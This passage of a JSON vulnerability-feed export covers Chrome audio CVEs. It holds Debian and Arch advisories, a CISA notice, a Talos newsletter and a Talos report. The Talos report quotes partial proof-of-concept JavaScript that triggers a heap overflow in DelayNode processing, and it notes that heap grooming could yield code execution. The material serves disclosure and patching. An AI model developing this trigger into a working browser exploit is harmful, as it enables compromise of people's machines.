"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "type": "debiancve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-25T15:15:00", "id": "DEBIANCVE:CVE-2019-13720", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21166", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talos": [{"lastseen": "2022-01-26T11:42:21", "description": "### Summary\n\nAn exploitable heap-based buffer overflow vulnerability exists in the Google Chromium browser affecting at least versions 89.0.4383.0 64-bit and 90.0.4390.0 64-bit. A specially crafted HTML web page can cause a heap-based Buffer Overflow condition, resulting in a remote code execution. The victim needs to visit malicious web site to trigger the vulnerability.\n\n### Tested Versions\n\nGoogle Chrome ver 841401 ( 89.0.4383.0 64-bit) \nGoogle Chrome ver 844161 ( 90.0.4390.0 64-bit)\n\n### Product URLs\n\n<https://www.google.com/chrome/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-122 - Heap-based Buffer Overflow\n\n### Details\n\nGoogle Chrome is a cross-platform web browser developed by Google.\n\nTo understand the vulnerability let us analyze some parts of the poc.html file and coresponding logged lines from the browser console:\n \n \n \"Mutation nodes amount : 6\"\n \"[ 4:21:34 PM ] :: Connecting nodes\"\n \"[ 4:21:34 PM ] :: Nodes connected\"\n \"[ 4:21:34 PM ] :: MediaElementAudioSourceNode_handler\"\n \"[ 4:21:34 PM ] :: AudioContext_handler\"\n \"IIRFilterNode: state is bad, probably due to unstable filter.\"\n \n \"[ 4:21:34 PM ] :: ScriptProcessorNode_oncomplete\"\n \"[ 4:21:34 PM ] :: Index : 1\"\n \"[ 4:21:34 PM ] :: Connect IIRFilterNode to DelayNode.delayTime\"\n \n\nAs we can see, after an initialization phase of PoC setup, first events start to appear and being handle. Crucial actions for our PoC take place inside the `oncomplete` event handler named `ScriptProcessorNode_oncomplete` of the `ScriptProcessorNode` node:\n \n \n Line 42 var g_fuzzRandom_index = 0;\n Line 43\n Line 44 //events handlers\n Line 45 function ScriptProcessorNode_oncomplete()\n Line 46 {\n Line 47 writeLog(\"ScriptProcessorNode_oncomplete\");\n Line 48 \n Line 49 g_fuzzRandom_index++;\n Line 50 writeLog(\"Index : \" + g_fuzzRandom_index);\n Line 51\n Line 52\n Line 53 if(g_fuzzRandom_index == 1)\n Line 54 { \n Line 55 writeLog(\"Connect IIRFilterNode to DelayNode.delayTime\");\n Line 56 audioNodesObjects.mutation[4].obj.connect( audioNodesObjects.mutation[5].obj.delayTime ); \n Line 57 return;\n Line 58 }\n \n\nDuring the first execution of `ScriptProcessorNode_oncomplete` event handler `IIRFilterNode` node is being connected to an AudioParam object. In our case it is a `delayTime` field of `DelayNode` object `line 56`. That connection is required to trigger the vulnerability but tests have shown that beside `IIRFilterNode` a different type of AudioNode can be also use to obtain the same result.\n\nWhen the `ScriptProcessorNode_oncomplete` handler is executed for a second time, the following lines will appear inside the log file:\n \n \n \"[ 4:21:35 PM ] :: ScriptProcessorNode_oncomplete\"\n \"[ 4:21:35 PM ] :: Index : 2\"\n \"[ 4:21:35 PM ] :: Switch delayTime of DelayNode to k-rate\"\n \n\nand the corresponding code is executed :\n \n \n Line 59\tif(g_fuzzRandom_index == 2)\n Line 60\t{ \n Line 61\t\t//DelayNode\n Line 62\t\twriteLog(\"Switch delayTime of DelayNode to k-rate\");\n Line 63\t\taudioNodesObjects.mutation[5].obj.delayTime.automationRate = \"k-rate\";\n Line 64\t\treturn;\n Line 65\t}\t \n \n\nThe crucial code is executed in `line 63` where value of `automationRate` field is changed to `k-rate` from `a-rate`. More details about possible `AutomationRate` values are available here: https://www.w3.org/TR/webaudio/#dom-audioparam-automationrate That switch during processing phase (we are inside oncomplete event handler) leads to the vulnerability inside `blink::AudioDelayDSPKernel::ProcessKRate` method located in file `third_party\\blink\\renderer\\platform\\audio\\audio_delay_dsp_kernel.cc`. As you might notice browsing code around `blink::AudioDelayDSPKernel::ProcessKRate` there is also method responsible of data procesing in case when `automationRate` field is set to `a-rate` and its called `AudioDelayDSPKernel::ProcessARate`. As I mentioned before, it seems to runtime change from \u201ca-rate\u201d to \u201ck-rate\u201d during processing phase have lead to internal state confusion of the `DelayNode` object and finally to the vulnerability in :\n \n \n audio_delay_dsp_kernel.cc\n \n Line 276 // Now copy out the samples from the buffer, starting at the read pointer,\n Line 277 // carefully handling wrapping of the read pointer.\n Line 278 float* read_pointer = &buffer[read_index1];\n Line 279 \n Line 280 int remainder = buffer_end - read_pointer;\n Line 281 memcpy(sample1, read_pointer,\n Line 282 sizeof(*sample1) *\n Line 283 std::min(static_cast<int>(frames_to_process), remainder));\n \n\nThere is no check whether `buffer_end` is smaller than `read_pointer` which in our case happens. Further in `line 281` as a size parameter for `memcpy` the smaller value of `frames_to_process` and `reminder` is selected. Because both variables are treated as a signed integer our `remainder` ends up beeing selected because its value is < 0\\. At the end its casted to size_t (unsigned value) what finally cause an attempt to copy a huge amount of memory.\n\nProper heap grooming can give an attacker full control of this heap overflow vulnerability and as a result could allow it to be turned into a arbitrary code execution.\n\n### Crash Information\n \n \n =================================================================\n ==1076==ERROR: AddressSanitizer: negative-size-param: (size=-8589824196)\n \t#0 0x7ff74867402f in __asan_memcpy C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\llvm\\compiler-rt\\lib\\asan\\asan_interceptors_memintrinsics.cpp:22\n \t#1 0x7ffaf2dc9ab1 in blink::AudioDelayDSPKernel::ProcessKRate(float const *, float *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_delay_dsp_kernel.cc:281:3\n \t#2 0x7ffaf2dcf38c in blink::AudioDSPKernelProcessor::Process(class blink::AudioBus const *, class blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_dsp_kernel_processor.cc:85:20\n \t#3 0x7ffaf23dfbac in blink::AudioBasicProcessorHandler::Process(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_basic_processor_handler.cc:85:18\n \t#4 0x7ffaf0be1e26 in blink::AudioHandler::ProcessIfNecessary(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node.cc:368:7\n \t#5 0x7ffaf18a8f2c in blink::AudioNodeOutput::Pull(class blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_output.cc:137:13\n \t#6 0x7ffaf18abfe6 in blink::AudioNodeInput::SumAllConnections(class scoped_refptr<class blink::AudioBus>, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_input.cc:128:40\n \t#7 0x7ffaf18ac278 in blink::AudioNodeInput::Pull(class blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_input.cc:158:3\n \t#8 0x7ffaf1953707 in blink::RealtimeAudioDestinationHandler::Render(class blink::AudioBus *, unsigned int, struct blink::AudioIOPosition const &, struct blink::AudioCallbackMetric const &) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\realtime_audio_destination_node.cc:207:18\n \t#9 0x7ffaf23c15a7 in blink::AudioDestination::RequestRender(unsigned __int64, unsigned __int64, double, double, unsigned __int64) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_destination.cc:251:17\n \t#10 0x7ffaf23c03f4 in blink::AudioDestination::Render(class blink::WebVector<float *> const &, unsigned __int64, double, double, unsigned __int64) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_destination.cc:194:5\n \t#11 0x7ffaedebee86 in content::RendererWebAudioDeviceImpl::Render(class base::TimeDelta, class base::TimeTicks, int, class media::AudioBus *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\content\\renderer\\media\\renderer_webaudiodevice_impl.cc:253:21\n \t#12 0x7ffada23aef4 in media::SilentSinkSuspender::Render(class base::TimeDelta, class base::TimeTicks, int, class media::AudioBus *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\base\\silent_sink_suspender.cc:84:14\n \t#13 0x7ffada171b16 in media::AudioOutputDeviceThreadCallback::Process(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\audio\\audio_output_device_thread_callback.cc:80:21\n \t#14 0x7ffada15810f in media::AudioDeviceThread::ThreadMain(void) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\audio\\audio_device_thread.cc:95:18\n \t#15 0x7ffae1c7f18f in base::`anonymous namespace'::ThreadFunc C:\\b\\s\\w\\ir\\cache\\builder\\src\\base\\threading\\platform_thread_win.cc:111:13\n \t#16 0x7ff74867e3a8 in __asan::AsanThread::ThreadStart(unsigned __int64, struct __sanitizer::atomic_uintptr_t *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\llvm\\compiler-rt\\lib\\asan\\asan_thread.cpp:273\n \t#17 0x7ffba61a7c23 (C:\\WINDOWS\\System32\\KERNEL32.DLL+0x180017c23)\n \t#18 0x7ffba7ced4d0 (C:\\WINDOWS\\SYSTEM32\\ntdll.dll+0x18006d4d0)\n \n\n### Timeline\n\n2021-01-26 - Vendor Disclosure \n2021-02-09 - Vendor Patched \n2021-05-19 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-19T00:00:00", "type": "talos", "title": "Google Chrome AudioDelayDSPKernel::ProcessKRate heap-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-05-19T00:00:00", "id": "TALOS-2021-1235", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:57", "description": "Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Chrome Release](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "cisa", "title": "Google Releases Security Updates for Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-10-31T00:00:00", "id": "CISA:809811C28F231C547A37018C8189C268", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-11-14T15:37:55", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThe only news we\u2019re going to cover this week is the biggest news we\u2019ve had in a while. Tuesday, we announced that Cisco Incident Response was becoming part of the Talos family. We\u2019ve been working together for years, but now we\u2019ll be closer than ever, so Incident Response can benefit from Talos\u2019 intelligence, while their boots-on-the-ground experience will only add to Talos\u2019 portfolio. \n \nCheck out our [announcement blog post](<https://blog.talosintelligence.com/2019/11/talos-cisco-incident-response-team-up.html>) for more information. The Talos Incident Response [at-a-glance](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/084/678/original/IR-AAG-3.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20191107%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20191107T153609Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=dafed95cccffbd6448473bcbb91f3516731d2ad25499ebcaf24147d014cceb32>) also provides an overview of the services IR provides. And the new [IR page](<https://talosintelligence.com/incident_response>) on TalosIntelligence.com gives you an easy way to contact IR, should you need their services. \n \nWe also have a [special edition of the Beers with Talos podcast](<https://blog.talosintelligence.com/2019/11/beers-with-talos-ep-65-please-welcome.html>), where Amy Henderson of Talos\u2019 Threat Interdiction team joins us to talk about the benefits of this new relationship. \n \n\n\n### Upcoming public engagements with Talos\n\n**Event: **\u201cIt\u2019s Never DNS\u2026. It Was DNS: How Adversaries Are Abusing Network Blind Spots\u201d at [SecureWV/Hack3rCon X](<https://securewv.org/>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date: **Nov. 15 - 17 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don\u2019t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. \n \n**Event: **\u201cReading Telegram messages abusing the shadows\u201d at [BSides Lisbon](<https://bsideslisbon.org/schedule/>)** ** \n**Location: **Auditorio FMD-UL, Lisbon, Portugal \n**Date: **Nov. 28 - 29 \n**Speakers: **Vitor Ventura \n**Synopsis: **One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications. \n \n**Event: **\u201cSigned, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks\u201d at [CactusCon](<https://www.cactuscon.com/2019-talks-and-workshops/signed-sealed-compromised-the-past-present-and-future-of-supply-chain-attacks>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date:** Dec. 6 - 7 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **This talk will discuss the common techniques we\u2019re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future. \n\n\n### Cyber Security Week in Review\n\n * The [first public exploitation of the BlueKeep vulnerability](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>) hit over the weekend. Security researchers noticed the attacks in honeypots installing cryptocurrency miners, far from the worst possible outcome from these kinds of attacks. \n * The U.S. and Taiwan [held cyber war exercises](<https://www.bbc.com/news/technology-50289974>) this week being touted as the first of their kind. Taiwanese officials say the two countries focused on attacks that could come from North Korean-linked adversaries and other nation-state actors. \n * The head of Russia\u2019s State Security Service recently said at a conference Russia and the U.S. have [resumed cooperation on cyber security](<https://www.thedailybeast.com/putins-top-spy-russian-fsb-chief-alexander-bortnikov-were-teaming-up-with-dc-on-cybersecurity>). Russia is maintaining contact between their security experts and the CIA, FBI and DEA in the U.S., he said. \n * Google is teaming up with [three private cyber security firms](<https://www.zdnet.com/article/google-asks-three-mobile-security-firms-to-help-scan-play-store-apps/>) to scan the Google Play store for malicious apps. Malware authors have been able to create ways to bypass the traditional protections Google put in place to stop malicious apps before they are posted on the store. \n * Two former Twitter employees were [charged with spying on behalf of Saudi Arabia](<https://www.cnn.com/2019/11/06/tech/twitter-employees-saudi-arabia-spying/index.html>). American prosecutors say the two men used their privileged access to gather information on Saudi political dissidents. \n * Voting machines in one Indiana country reportedly [switched users\u2019 votes](<https://thehill.com/homenews/state-watch/469137-machines-reportedly-switching-votes-plagues-indiana-county-for-second>), one of a few reports of malfunctioning machines on election day in the U.S. Several voters reported that the touchscreen machines would not select the candidate they wanted to choose, errors that are backed up with video evidence. \n * Apple [released updates](<https://www.forbes.com/sites/zakdoffman/2019/10/31/apple-patches-serious-ios-13-and-catalina-security-issues-update-your-devices-now/#34d873a52c2a>) for its Catalina operating system and iOS to patch several critical remote code execution vulnerabilities. The U.S. Department of Homeland Security urged users to update their devices as soon as possible. \n * Malware authors are starting to [unleash a wave of politically themed malware](<https://blog.talosintelligence.com/2019/11/political-malware.html>). Talos recently discovered malware families using the likenesses of U.S. Donald Trump and Russian leader Vladimir Putin in a series of ransomware, RATs and screenlockers. \n\n### Notable recent security issues\n\n**Title: **[Use-after-free bug in Chrome could allow complete system takeover](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) \n**Description: **Google Chrome is urging users to update their web browsers as soon as possible due to a critical use-after-free vulnerability. The company says it will be releasing updates this week to protect against exploitation of the bug. The vulnerability, identified as CVE-2019-13720, exists in Chrome\u2019s audio component, and could allow an attacker to execute arbitrary code or enable full remote code execution capabilities. \n**Snort SIDs: **52068, 52069 \n** \n****Title: **[Two remote code execution vulnerabilities in Investintech Able2Extract](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-RCE-investintech-able2extract-nov-2019.html>) \n**Description: **Cisco Talos recently discovered two remote code execution vulnerabilities in Investintech\u2019s Able2Extract Professional. This software is a cross-platform PDF tool for Windows, Mac and Linux that converts PDFs and allows users to create and edit them. Other features include PDF signing, redactions and annotations. An attacker could exploit these vulnerabilities to execute arbitrary code on the victim machine. \n**Snort SIDs: **50864 - 50869 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/gui/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename:** xme64-2141.exe \n**Claimed Product: **N/A \n**Detection Name:** W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854](<https://www.virustotal.com/gui/file/6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854/details>) \n**MD5:** 74f4e22e5be90d152521125eaf4da635 \n**Typical Filename:** jsonMerge.exe \n**Claimed Product:** ITSPlatform \n**Detection Name: **W32.GenericKD:Attribute.22lk.1201 \n \n**SHA 256: **[46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08](<https://www.virustotal.com/gui/file/46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08/details>) \n**MD5:** db69eaaea4d49703f161c81e6fdd036f \n**Typical Filename: **xme32-2141-gcc.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.46B241E3D3-95.SBX.TG \n \n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5:** 8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** Eternalblue-2.2.0.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.WNCryLdrA:Trojan.22k2.1201\n\n", "cvss3": {}, "published": "2019-11-14T07:12:30", "type": "talosblog", "title": "Threat Source newsletter (Nov. 7, 2019)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-14T07:12:30", "id": "TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4n3ghJUQWvA/threat-source-newsletter-oct-31-2019.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-7\n=========================================\n\nSeverity: Critical\nDate : 2019-11-04\nCVE-ID : CVE-2019-13720\nPackage : electron\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1061\n\nSummary\n=======\n\nThe package electron before version 7.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 7.0.1-1.\n\n# pacman -Syu \"electron>=7.0.1-1\"\n\nThe problem has been fixed upstream in version 7.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://github.com/electron/electron/commit/25b3ee29cf9a8e3f59dcbabf7345b5b1360cd056\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-04T00:00:00", "type": "archlinux", "title": "[ASA-201911-7] electron: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-04T00:00:00", "id": "ASA-201911-7", "href": "https://security.archlinux.org/ASA-201911-7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-2\n=========================================\n\nSeverity: Critical\nDate : 2019-11-02\nCVE-ID : CVE-2019-13720\nPackage : qt5-webengine\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1059\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.13.2-2 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 5.13.2-2.\n\n# pacman -Syu \"qt5-webengine>=5.13.2-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/64347\nhttps://code.qt.io/cgit/qt/qtwebengine-chromium.git/patch/?id=d6e5fc10e417efdf8665d9fba57c269f0534072f\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-02T00:00:00", "type": "archlinux", "title": "[ASA-201911-2] qt5-webengine: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 